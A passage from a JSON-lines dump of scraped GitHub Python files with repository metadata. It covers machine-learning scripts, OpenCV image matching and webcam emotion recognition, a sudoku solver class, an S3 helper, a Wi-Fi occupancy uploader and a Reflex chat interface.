shutil.copy(str(file-tools), dst_path_jsons)\n# # elif file_suffix == '.jpg':\n# # shutil.copy(str(file-tools), dst_path_images)\n# # return processed_file_names\n# #\n# #\n# # for _dir in src_dirs:\n# # sub_dirs = [i for i in Path(str(_dir)).iterdir() if i.is_dir()]\n# #\n# # sub_sub_dirs = [i for i in Path(str(sub_dirs)).iterdir() if i.is_dir()]\n# # for dir_tmp in sub_sub_dirs:\n#\n# #\n# # if len(sub_dirs) == 0:\n# # files1 = [i for i in Path(str(_dir)).iterdir() if i.is_file()]\n# # processed_file_names = process_files(processed_file_names, files1)\n# #\n# # elif len(sub_dirs) > 0:\n# # sub_sub_dirs = [i for i in Path(str(sub_dirs)).iterdir() if i.is_dir()]\n# # for dir_tmp in sub_sub_dirs:\n# # files2 = [i for i in Path(str(dir_tmp)).iterdir() if i.is_file()]\n# # processed_file_names = process_files(processed_file_names, files2)\n#\n#\n","repo_name":"thinkinchaos/Tools","sub_path":"Datasets/labelme/check_4_15.py","file_name":"check_4_15.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2469327245","text":"import time\nimport statistics\nimport collections\nimport numpy\nfrom IPython.display import display, FileLinks\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport pandas as pd\n\nstart = time.time()\n\ntrain = pd.read_csv('../input/train.csv')\nx = train.drop(['id', 'species'], axis=1).values\nle = LabelEncoder().fit(train['species'].values)\nscaler = StandardScaler().fit(x)\nx = scaler.transform(x)\ny = le.transform(train['species'])\n\nc = LogisticRegression(C=3000)#, multi_class='multinomial', solver='sag')\n\naccs = []\nlosses = []\nsss = StratifiedShuffleSplit(n_splits=2, test_size=0.2, random_state=23)\nfor train_index, test_index in sss.split(x, y):\n c.fit(x[train_index], y[train_index])\n acc = accuracy_score(y[test_index], c.predict(x[test_index]))\n loss = log_loss(y[test_index], c.predict_proba(x[test_index]))\n display('{} {}'.format(acc, loss))\n accs.append(acc)\n losses.append(loss)\n\ndisplay('---')\ndisplay('{} {}'.format(statistics.mean(accs), statistics.mean(losses)))\ndisplay('it took {}s'.format(time.time() - start))\n\n\nc = c.fit(x, y)\n\ntest = pd.read_csv('../input/test.csv')\ntest_ids = test.pop('id')\nx_test = test.values\nx_test = scaler.transform(x_test)\n\ny_test = c.predict_proba(x_test)\npd.DataFrame(y_test, index=test_ids, columns=le.classes_).to_csv('result.csv')\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/leaf-classification/logits/leaf-playground.py","file_name":"leaf-playground.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"7197246975","text":"# Generar numeros de 1 a 200, sumarlos hasta obtener 100\n\n# print('Generar n numeros para obtener una ganancia ')\n# ganar = int(input('Cuanto quieres ganar ? '))\n# c = 0\n# suma = 0\n# while suma < ganar:\n# c += 1\n# suma += c\n# print('Suma = ',suma)\n# print(f'Use {c} nuemeros')\n\n\nprint('Generar n numeros para obtener una ganancia ')\nganar = int(input('Cuanto quieres ganar ? '))\nc = 0\nsuma = 0\nwhile c < 500:\n c += 1\n suma += c\n print(c, end=' ')\n if suma >= ganar:\n print('\\n')\n break\n\nprint('Suma > ', suma)","repo_name":"castruaz/compapl-2022","sub_path":"p32-numeros-1a200-suma100.py","file_name":"p32-numeros-1a200-suma100.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10888559182","text":"from os import environ\nfrom flask import Flask, Request\nfrom mock import patch\n\nenviron[\"COLLECTOR_ENDPOINT\"] = \"jaeger\"\n\nimport main\n\nclass StubRequest():\n\n def __init__(self, headers):\n self.headers = headers\n\n@patch('main.logger')\ndef test_chorus(mock_logger):\n app = Flask(__name__)\n with app.app_context():\n request = StubRequest({'traceparent': '00-0000000000000000000000000000000f-000000000000000a-00'})\n response = main.entry_point(request)\n assert response.status_code == 200\n assert mock_logger.mock_calls[-1][0] == 'info'","repo_name":"peckhamdata/open-telemetry-gcp-demo","sub_path":"cloud_functions/chorus/test/test_chorus.py","file_name":"test_chorus.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3449340041","text":"from json import dumps\nfrom cf import resource_filepath, CollaborativeFiltering\nfrom argparse import ArgumentParser\n\n\ndef parse_arguments():\n parser = ArgumentParser(description=\"Collaborative filtering runner\")\n parser.add_argument(\"--user-id\", type=int, help=\"User id\", dest=\"user_id\", default=1)\n parser.add_argument(\"--ranks-filename\", type=str, help=\"Ranks filename\", dest=\"ranks_filename\", default=\"u.base\")\n parser.add_argument(\"--items-filename\", type=str, help=\"Items filename\", dest=\"items_filename\", default=\"u.item\")\n parser.add_argument(\"--model-filename\", type=str, help=\"Model filename\", dest=\"model_filename\", default=\"model.pkl\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--train\", action=\"store_true\")\n group.add_argument(\"--test\", action=\"store_true\")\n return parser.parse_args()\n\n\ndef train(model_filepath, items_filepath, ranks_filepath):\n items_columns = [\"movie id\", \"movie title\", \"release date\", \"video release date\", \"IMDb URL\", \"unknown\", \"Action\",\n \"Adventure\",\n \"Animation\", \"Children's\", \"Comedy\", \"Crime\", \"Documentary\", \"Drama\", \"Fantasy\", \"Film-Noir\",\n \"Horror\",\n \"Musical\", \"Mystery\", \"Romance\", \"Sci-Fi\", \"Thriller\", \"War\", \"Western\"]\n ranks_columns = [\"user_id\", \"item_id\", \"rating\", \"timestamp\"]\n cf = CollaborativeFiltering()\n cf.load_data(items_filepath=items_filepath, ranks_filepath=ranks_filepath, items_columns=items_columns,\n ranks_columns=ranks_columns)\n\n cf.train()\n cf.serialize(model_filepath)\n print(dumps({\"model_filepath\": model_filepath}, indent=4))\n\n\ndef test(model_filepath):\n cf = CollaborativeFiltering.deserialize(model_filepath)\n predictions = cf.predict(args.user_id)\n print(dumps({\"predictions\": predictions, \"user-id\": args.user_id}, indent=4))\n\n\n\ndef main(args):\n model_filepath = resource_filepath(args.model_filename)\n if args.train:\n items_filepath = resource_filepath(args.items_filename)\n ranks_filepath = resource_filepath(args.ranks_filename)\n train(model_filepath, items_filepath, ranks_filepath)\n elif args.test:\n test(model_filepath)\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n main(args)\n","repo_name":"BdoubleU42/cf","sub_path":"cf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16931022861","text":"import pandas as pd\nimport os\nimport csv\nimport json \nimport requests\nimport sys\nimport time\n\nlocation = \"FILL\"\nname = \"FILL\"\ndsc = \"FILL\"\nlabel = \"FILL\"\nDATA_DIR = \"raw_data\"\n\n\"\"\"# Import the data\"\"\"\nwhile True:\n time.sleep(30*60) #30 minutes\n for csv in os.listdir(DATA_DIR):\n df = pd.read_csv(DATA_DIR+\"/\"+csv)\n df.drop(' BSSID', axis=1, inplace=True)\n df.drop(' Probed ESSIDs', axis=1, inplace=True)\n df.drop(' First time seen', axis=1, inplace=True)\n df.drop(' # packets', axis=1, inplace=True)\n df.columns = [\n 'mac',\n 'last_seen',\n 'power'\n ]\n data = df.to_dict()\n r = requests.post(\"api.studyspotter.ca\", data = {\"location\": location, \"name\": name, \"dsc\": dsc, \"label\": label, **data})","repo_name":"samuellando/StudySpotter","sub_path":"backend/nodes/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12486863030","text":"import torch\n\nDEVICE = torch.device('cuda:0')\nDATASET_PATH = \"dataset/images\"\nTRAIN_DATASET = \"dataset/train.csv\"\nTEST_DATASET = \"dataset/test.csv\"\nCOMPOSED_GTREND = \"dataset/gtrends.csv\"\nCATEG_DICT = \"category_labels.pt\"\nCOLOR_DICT = \"color_labels.pt\"\nFAB_DICT = \"fabric_labels.pt\"\nNUM_EPOCHS = 50\nUSE_TEACHERFORCING = True\nTF_RATE = 0.5\nLEARNING_RATE = 0.0001\nNORMALIZATION_VALUES_PATH = \"dataset/normalization_scale.npy\"\nBATCH_SIZE= 128\nSHOW_PLOTS = False\nNUM_WORKERS = 8\nUSE_EXOG = True\nEXOG_NUM = 3\nEXOG_LEN = 52\nHIDDEN_SIZE = 300\nSAVED_FEATURES_PATH = \"incv3_features\"\nUSE_SAVED_FEATURES = False\nNORM = False\nmodel_types = [\"image\", \"concat\", \"residual\", \"cross\"]\nMODEL = 1\n","repo_name":"HumaticsLAB/AttentionBasedMultiModalRNN","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"35924655561","text":"import cv2\nimport numpy as np\n\nfrom detectors.utils import translate, mask_diff\n\n\ndef find_dxy_mode(dx_dy_s, base=100):\n dxy = [dx * base + dy for dx, dy in dx_dy_s]\n counts = np.bincount(dxy)\n print(max(counts))\n dxy_mode = np.argmax(counts)\n dx = dxy_mode // base\n dy = dxy_mode % base\n return dx, dy\n\n\ndef sift_kp(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)\n # gray_image = cv2.Canny(gray_image, 50, 100)\n # cv2.imshow('gray_image', gray_image)\n # cv2.waitKey()\n\n sift = cv2.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(gray_image, None)\n kp_image = cv2.drawKeypoints(gray_image, kp, None)\n return kp_image, kp, des\n\n\ndef sift_match(img1_3c, img2_4c):\n img2_3c = img2_4c[:, :, :3]\n kpimg1, kp1, des1 = sift_kp(img1_3c)\n kpimg2, kp2, des2 = sift_kp(img2_3c)\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1, des2, k=2)\n\n good_match_dx_dy_s = []\n for m, n in matches:\n x1, y1 = int(kp1[m.queryIdx].pt[0]), int(kp1[m.queryIdx].pt[1])\n x2, y2 = int(kp2[m.trainIdx].pt[0]), int(kp2[m.trainIdx].pt[1])\n good_match_dx_dy_s.append([m.distance / n.distance, n, abs(x1 - x2), abs(y1 - y2)])\n good_match_dx_dy_s = sorted(good_match_dx_dy_s)\n good_match_dx_dy_s = np.array(good_match_dx_dy_s)\n\n top_n = 5\n dx_dy_s = good_match_dx_dy_s[:top_n, 2:]\n\n dx, dy = find_dxy_mode(dx_dy_s)\n translated_img1 = translate(img1_3c, -dx, -dy)\n mask_diff_img, diff_sum = mask_diff(img2_4c[:, :, 3], img2_4c[:, :, :3], translated_img1)\n\n print(diff_sum)\n cv2.imshow(\"diff\", mask_diff_img)\n match_s = good_match_dx_dy_s[:top_n, 1]\n match_img = cv2.drawMatches(img1_3c, kp1, img2_3c, kp2, match_s, None, flags=2)\n cv2.imshow('match_img', match_img)\n cv2.waitKey()\n\n return diff_sum\n\n\nif __name__ == '__main__':\n import os\n\n reference_dir = 'calibrate_images'\n test_dir = 'test_images'\n for test_name in os.listdir(test_dir):\n test_im = cv2.imread(os.path.join(test_dir, test_name))\n for reference_name in os.listdir(reference_dir):\n reference_im = cv2.imread(os.path.join(reference_dir, reference_name), cv2.IMREAD_UNCHANGED)\n\n min_h = min(reference_im.shape[0], test_im.shape[0])\n min_w = min(reference_im.shape[1], test_im.shape[1])\n reference_im = reference_im[:min_h, :min_w, :]\n test_im = test_im[:min_h, :min_w, :]\n\n sift_match(test_im, reference_im)\n","repo_name":"Ryanshuai/auto_pubg","sub_path":"detectors/gun_scope_detector/deep_detection.py","file_name":"deep_detection.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16465321925","text":"class Board:\n num_objects = 0 # Boardオブジェクトがいくつ作られたかトラッキングするクラス変数\n\n def __init__(self, data, allowed_digits=None):\n '''インスタンス変数self.dataは各マスに置かれた数字を要素とする9x9のリスト、\n self.allowed_digitsは各マスに置ける数字の集合を要素とする9x9のリスト'''\n Board.num_objects += 1\n self.data = data\n if allowed_digits is None:\n self.precompute_allowed_digits()\n else:\n self.allowed_digits = allowed_digits\n\n @classmethod\n def get_row(cls, obj, x):\n '''9x9の2次元リストobjからx行目を取り出す。objとしてはself.dataまたは\n self.allowed_digitsに準ずる2次元リストが渡されることを想定。'''\n return obj[x]\n\n @classmethod\n def get_column(cls, obj, y):\n '''9x9の2次元リストobjからy列目を取り出す'''\n return [obj[x][y] for x in range(9)]\n\n @classmethod\n def get_block(cls, obj, x, y):\n '''9x9の2次元リストobjから(x, y)が属する3x3ブロックを取り出す'''\n base_x = x // 3 * 3\n base_y = y // 3 * 3\n return [obj[x][y] for x in range(base_x, base_x + 3)\n for y in range(base_y, base_y + 3)]\n\n def filled(self):\n return all(0 not in self.data[x] for x in range(9))\n\n def verify(self):\n def check(xs):\n '''リストxsが0~9の数からなり、1~9については重複がないことを\n チェックするヘルパー関数'''\n xs = [x for x in xs if x != 0]\n return (len(set(xs)) == len(xs) and all(1 <= x <= 9 for x in xs))\n\n return (all(check(Board.get_row(self.data, x)) for x in range(9))\n and all(check(Board.get_column(self.data, y)) for y in range(9))\n and all(check(Board.get_block(self.data, x, y)) for x in (0, 3, 6)\n for y in (0, 3, 6)))\n\n def get_allowed_digits(self, x, y):\n return list(self.allowed_digits[x][y])\n\n def update_allowed_digits(self, allowed_digits, x, y, d):\n if d > 0:\n allowed_digits[x][y] = set()\n for obj in Board.get_row(allowed_digits, x):\n # 同じ行のマスの候補リストからdを除外\n obj.discard(d)\n for obj in Board.get_column(allowed_digits, y):\n # 同じ列のマスの候補リストからdを除外\n obj.discard(d)\n for obj in Board.get_block(allowed_digits, x, y):\n # 同じ3x3ブロックのマスの候補リストからdを除外\n obj.discard(d)\n\n def precompute_allowed_digits(self):\n self.allowed_digits = [\n [{1, 2, 3, 4, 5, 6, 7, 8, 9} for y in range(9)] for x in range(9)\n ]\n for x in range(9):\n for y in range(9):\n d = self.data[x][y]\n self.update_allowed_digits(self.allowed_digits, x, y, d)\n\n def move(self, x, y, d):\n assert self.data[x][y] == 0\n data = []\n for i, row in enumerate(self.data):\n if i != x:\n data.append(row)\n else:\n new_row = list(row)\n new_row[y] = d\n data.append(new_row)\n allowed_digits = [\n [set(self.allowed_digits[x][y]) for y in range(9)] for x in range(9)\n ] # set()をつけることによりdeep copyを行う\n self.update_allowed_digits(allowed_digits, x, y, d)\n return Board(data, allowed_digits)\n\n def __str__(self):\n separator = '+---+---+---+'\n lines = [separator]\n for i in range(0, 9, 3):\n for j in range(i, i + 3):\n lines.append('|%d%d%d|%d%d%d|%d%d%d|' % tuple(self.data[j]))\n lines.append(separator)\n return '\\n'.join(lines).replace('0', ' ')\n\n\nif __name__ == '__main__':\n import sudoku as su\n problem = Board(su.text_to_data(su.PROBLEM))\n solution = Board(su.text_to_data(su.SOLUTION))\n board = problem\n print(board.move(0, 1, 1))","repo_name":"hayasitakumi/python_study","sub_path":"miniproject7/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42732711874","text":"import cv2\nimport time\nimport numpy as np\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render\nfrom django.http import StreamingHttpResponse\nfrom django.views.decorators import gzip\nfrom tensorflow.keras.models import load_model\n\n\nemotions = {0: 'Angry', 1: 'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Sad', 5: 'Surprise', 6: 'Neutral'}\n\n\ndef gen(camera):\n last_prediction = time.time()\n model = load_model(\"/home/greywater/Documents/Kirae/app/src/model/model_vgg13\")\n\n while True:\n ret, img = camera.read()\n img_bytes = cv2.imencode('.jpg', img)[1].tobytes()\n\n image_np = np.fromstring(img_bytes, np.uint8)\n image_cv = cv2.imdecode(image_np, cv2.IMREAD_COLOR)\n\n image_gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)\n\n dir_cascade_files = r\"/home/greywater/Documents/Kirae/app/src/model/.opencv/haarcascades/\"\n cascade_file = dir_cascade_files + \"haarcascade_frontalface_alt2.xml\"\n cascade = cv2.CascadeClassifier(cascade_file)\n\n faces = cascade.detectMultiScale(\n image_gray,\n scaleFactor=1.1,\n minNeighbors=1,\n minSize=(48, 48),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n if len(faces) >= 1:\n for (x, y, w, h) in faces:\n image_cv = cv2.rectangle(image_cv, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n face_image = image_gray[y:y + h, x:x + w]\n image_face_cv = cv2.resize(face_image, (48, 48))\n image_enhanced = cv2.equalizeHist(image_face_cv)\n image_chan = image_enhanced.reshape(1, 48, 48, 1)\n\n if time.time() - last_prediction >= 5:\n prediction = emotions[np.argmax(model.predict(image_chan), axis=1)[0]]\n else:\n prediction = \"No face detected\"\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n text_size = cv2.getTextSize(prediction, font, 1, 2)[0]\n text_X = (image_cv.shape[1] - text_size[0]) / 2\n text_Y = (image_cv.shape[0] + text_size[1]) / 2\n cv2.putText(image_cv, prediction, (int(text_X), int(text_Y)), font, 1, (0, 255, 0), 2)\n\n _, jpeg = cv2.imencode('.jpg', image_cv)\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + jpeg.tobytes() + b'\\r\\n\\r\\n')\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n camera.release()\n cv2.destroyAllWindows()\n\n\n@gzip.gzip_page\ndef webcam_feed(request):\n try:\n cam = cv2.VideoCapture(0)\n return StreamingHttpResponse(gen(cam), content_type=\"multipart/x-mixed-replace;boundary=frame\")\n except Exception as ex:\n print(ex)\n\n\ndef webcam(request):\n if request.user.is_authenticated :\n return render(request, \"web_ai/webcam.html\")\n else:\n raise PermissionDenied\n\n\ndef homepage(request):\n return render(request, \"web_ai/index.html\")\n\n","repo_name":"GreyWaterMatters/app_fer","sub_path":"web_ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72172168803","text":"\"\"\"\n @Author : liujianhan\n @Date : 2018/5/26 下午2:05\n @Project : action_class_v1\n @FileName : demo.py\n @Description : 多进程视频实时识别demo\n\"\"\"\nimport os\nimport time\nfrom multiprocessing import Queue, Process\n\nimport cv2\n\n# from action_class_v1.service import inference, load_model\nfrom action_class.service import get_dot_config, inference, load_model\n\n\ndef video_producer(video_path: str, task: Queue = Queue(), result: Queue = Queue()) -> None:\n \"\"\"\n 视频读取函数\n @param video_path: 视频路径\n @param task: 视频帧队列\n @param result: 识别结果队列\n @return:\n \"\"\"\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n print('No video found!')\n os._exit(-1)\n n_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n dur = n_frames / fps\n print(f\"视频总帧数:{n_frames}帧\")\n print(f\"视频帧率:{int(fps)}帧每秒\")\n last = int(1/fps * 1000)\n print(f\"视频每帧持续时间:{last}ms\")\n print(f\"视频总时长:{dur}s\")\n\n t1 = time.time()\n cnt = 0\n action, score = '', 0\n ret, frame = cap.read()\n task.put(frame)\n cv2.namedWindow('frame', 0)\n cv2.resizeWindow('frame', 1920, 1080)\n while 1:\n if not result.empty():\n action, score = result.get()\n task.put(frame)\n if action == 'negative':\n cv2.putText(frame, f'Frame - {cnt} - {action} - score - {score}', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 255, 0), 2)\n elif action == 'positive':\n cv2.putText(frame, f'Frame - {cnt} - {action} - score - {score}', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 0, 255), 2)\n else:\n cv2.putText(frame, f'Initializing....', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 255, 0), 2)\n\n cv2.imshow('frame', frame)\n\n ret, frame = cap.read()\n if not ret:\n task.put(None)\n break\n\n # 设置延迟,在延迟期间按下ESC退出循环\n if cv2.waitKey(last) == 27:\n break\n cnt += 1\n\n print(f\"持续时间: {time.time() - t1:.3f}s\")\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef model_consumer(task: Queue = Queue(), result: Queue = Queue()) -> None:\n \"\"\"\n 模型推理函数\n @param task:\n @param result:\n @return:\n \"\"\"\n while True:\n frame = task.get()\n if frame is None:\n print(\"没有视频数据了。\")\n break\n new_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n action, score = inference(new_frame)\n result.put((action, score))\n\n\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = ''\n config = get_dot_config('action_class/config.yml')\n config.final_model_file = 'data_path/model/final_model_multi_output_0613.h5'\n load_model()\n\n task = Queue()\n result = Queue()\n video_path = 'action_class_v1/data_path/raw_video/20200527_103654.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200527_104527.mp4'\n # video_path = 'rtmp://58.200.131.2:1935/livetv/dftv '\n # video_path = '../action_class_v1/data_path/raw_video/20200530_185954_test.mp4'\n\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_184219.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_184701.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_185238.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_185502.mp4'\n\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_184035.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_184609.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_185150.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_185104.mp4' # valid 测试4\n video_path = '../action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_183928.mp4' # test 测试3\n\n # video_path = 'action_class/data_path/raw_video/20200610_190023.mp4' # 没有分帧的valid视频 测试2\n # video_path = '20200611_data/positive1_valid.mp4' # valid 测试1\n # video_path = '20200611_data/positive2.mp4' # train-3761frame\n # video_path = '20200611_data/positive3.mp4' # train-1737frame\n video_path = 'data_path/raw_video/20200611_data/positive4.mp4' # train-3240 candi3 temp\n # video_path = '20200611_data/positive5.mp4' # train-2575 candi2\n\n # video_path = '20200611_data/positive6.mp4' # train-2687frame\n # video_path = '20200611_data/positive7.mp4' # train-2089 candidate1\n # video_path = '20200611_data/positive8.mp4' # train-2690frame with pointself not recognize\n # video_path = '20200611_data/positive9.mp4' # train-444frame point myself\n c1 = Process(target=video_producer, args=(video_path, task, result))\n c1.start()\n model_consumer(task, result)\n","repo_name":"jh-lau/solid_ai_waddle","sub_path":"project/classification/posture_classification/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38603543105","text":"import requests\nimport json\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n\n# Initilize API_KEY\n# Get the path to the directory this file is in\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n# Connect the path with your '.env' file name\nload_dotenv(os.path.join(BASEDIR, '.env'))\n\nAPI_KEY = os.getenv(\"API_Authorization\")\n\ndef get_university_from_db():\n base_url = \"https://api.m3o.com/v1/db/Read\"\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + API_KEY\n}\n table_to_query = 'university'\n payload = json.dumps({\n \"table\": table_to_query\n })\n \n response = requests.post(base_url, headers=headers, data=payload)\n json_data = json.loads(response.text)\n return json_data['records']\n \ndef get_universities_by_country(country):\n base_url = \"http://universities.hipolabs.com/search?\"\n params = {\n 'country': country,\n }\n response = requests.get(base_url, params=params)\n status_code = response.status_code\n json_data = json.loads(response.text)\n return json_data, status_code","repo_name":"synco1111/Madlan_BE_Automation_Exercise","sub_path":"tests/universe_api.py","file_name":"universe_api.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26322778501","text":"import os\n\nfor file in os.listdir(\"./data\"):\n print(file)\n if file.endswith(\".md\") :\n new_name = file.rstrip(\".md\")\n src = \"./data/\"+file\n dist = \"./data/\"+new_name+\".rmd\"\n os.rename(src, dist)\n print(\"rename\", src, \"to\", dist)\n elif file.endswith(\".markdown\"):\n new_name = file.rstrip(\".markdown\")\n src = \"./data/\"+file\n dist = \"./data/\"+new_name+\".rmd\"\n os.rename(src, dist)\n print(\"rename\", src, \"to\", dist)\n\n","repo_name":"hominee/demo","sub_path":"tormd.py","file_name":"tormd.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71238354721","text":"import boto3\nfrom WrenchCL.WrenchLogger import wrench_logger\n\n\nclass S3Handler:\n \"\"\"\n A class to handle S3 operations following the Singleton pattern.\n\n Attributes:\n - s3_client (boto3.client): The S3 client used for operations.\n \"\"\"\n\n _instance = None # Singleton instance\n\n def __new__(cls):\n \"\"\"Implement Singleton pattern.\"\"\"\n if cls._instance is None:\n cls._instance = super(S3Handler, cls).__new__(cls)\n cls._instance.initialized = False # Indicate if the class has been initialized with configuration\n return cls._instance\n\n def __init__(self):\n self.initialized = False\n \"\"\"Initialize the S3Handler class.\"\"\"\n if not hasattr(self, \"s3_client\"):\n self.s3_client = None\n\n def load_configuration(self, key_id, secret_key, region):\n \"\"\"\n Load AWS configuration for S3 client.\n\n Parameters:\n - key_id (str): AWS Access Key ID\n - secret_key (str): AWS Secret Access Key\n - region (str): AWS region\n \"\"\"\n try:\n self.s3_client = boto3.client('s3', aws_access_key_id=key_id,\n aws_secret_access_key=secret_key,\n region_name=region)\n wrench_logger.debug('Initialized S3 client successfully.')\n self.initialized = True\n except Exception as e:\n wrench_logger.error(f'Failed to initialize S3 client: {e}')\n self.initialized = False\n raise e\n\n def list_files(self, bucket_name, s3_path_prefix=''):\n \"\"\"\n List files in an S3 bucket path.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - s3_path_prefix (str): Path prefix to filter files\n\n Returns:\n - list: List of file names\n \"\"\"\n if not self.initialized:\n wrench_logger.error('S3Handler is not initialized. Please run the load_configuration() method')\n raise NotImplementedError\n\n response = self.s3_client.list_objects_v2(Bucket=bucket_name, Prefix=s3_path_prefix)\n return [item['Key'] for item in response.get('Contents', [])]\n\n def upload_file(self, bucket_name, file_path, s3_path):\n \"\"\"\n Upload a file to an S3 bucket.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - file_path (str): Local path to the file to be uploaded\n - s3_path (str): Destination path in the S3 bucket\n\n Returns:\n - bool: True if successful, False otherwise\n \"\"\"\n try:\n self.s3_client.upload_file(file_path, bucket_name, s3_path)\n wrench_logger.info(f'File {file_path} uploaded to {s3_path} in bucket {bucket_name}.')\n return True\n except Exception as e:\n wrench_logger.error(f'Failed to upload file {file_path} to {s3_path} in bucket {bucket_name}: {e}')\n return False\n\n def delete_file(self, bucket_name, s3_path):\n \"\"\"\n Delete a file from an S3 bucket.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - s3_path (str): Path in the S3 bucket to the file to be deleted\n\n Returns:\n - bool: True if successful, False otherwise\n \"\"\"\n try:\n self.s3_client.delete_object(Bucket=bucket_name, Key=s3_path)\n wrench_logger.info(f'File {s3_path} deleted from bucket {bucket_name}.')\n return True\n except Exception as e:\n wrench_logger.error(f'Failed to delete file {s3_path} from bucket {bucket_name}: {e}')\n return False\n\n\ns3Instance = S3Handler()\n","repo_name":"WrenchAI/WrenchCL","sub_path":"WrenchCL/S3Handler.py","file_name":"S3Handler.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41692109642","text":"import reflex as rx\nfrom hello_reflex import style\nfrom hello_reflex.state import State\n\n\ndef qa(question: str, answer: str) -> rx.Component:\n return rx.box(\n rx.box(\n rx.text(question),\n style=style.question_style, # Apply styling to the question box\n text_align=\"right\", # Align the text within the question box to the right\n ),\n rx.box(\n rx.text(answer),\n style=style.answer_style,\n text_align=\"left\", # Align the text within the answer box to the left\n ),\n margin_y=\"1em\",\n )\n\n\ndef chat() -> rx.Component:\n return rx.box(\n rx.foreach(\n State.chat_history,\n lambda messages: qa(messages[0], messages[1]),\n )\n )\n\n\ndef action_bar() -> rx.Component:\n return rx.hstack(\n rx.input(\n id=\"question\",\n placeholder=\"Ask a question\",\n on_blur=State.set_question,\n style=style.input_style,\n ),\n rx.button(\n \"Ask\",\n on_click=State.answer,\n style=style.button_style,\n ),\n )\n\n\ndef index() -> rx.Component:\n return rx.container(\n rx.box(\n rx.heading(\"Nacho-GPT 💬\", size=\"2xl\"),\n style=style.nacho_gpt_heading,\n text_align=\"center\",\n ),\n chat(),\n action_bar(),\n rx.box(\n rx.text(\"Made with ❤️ by Nacho Campos Dev\"),\n rx.text(\"Powered by OpenAI's GPT-3\"),\n 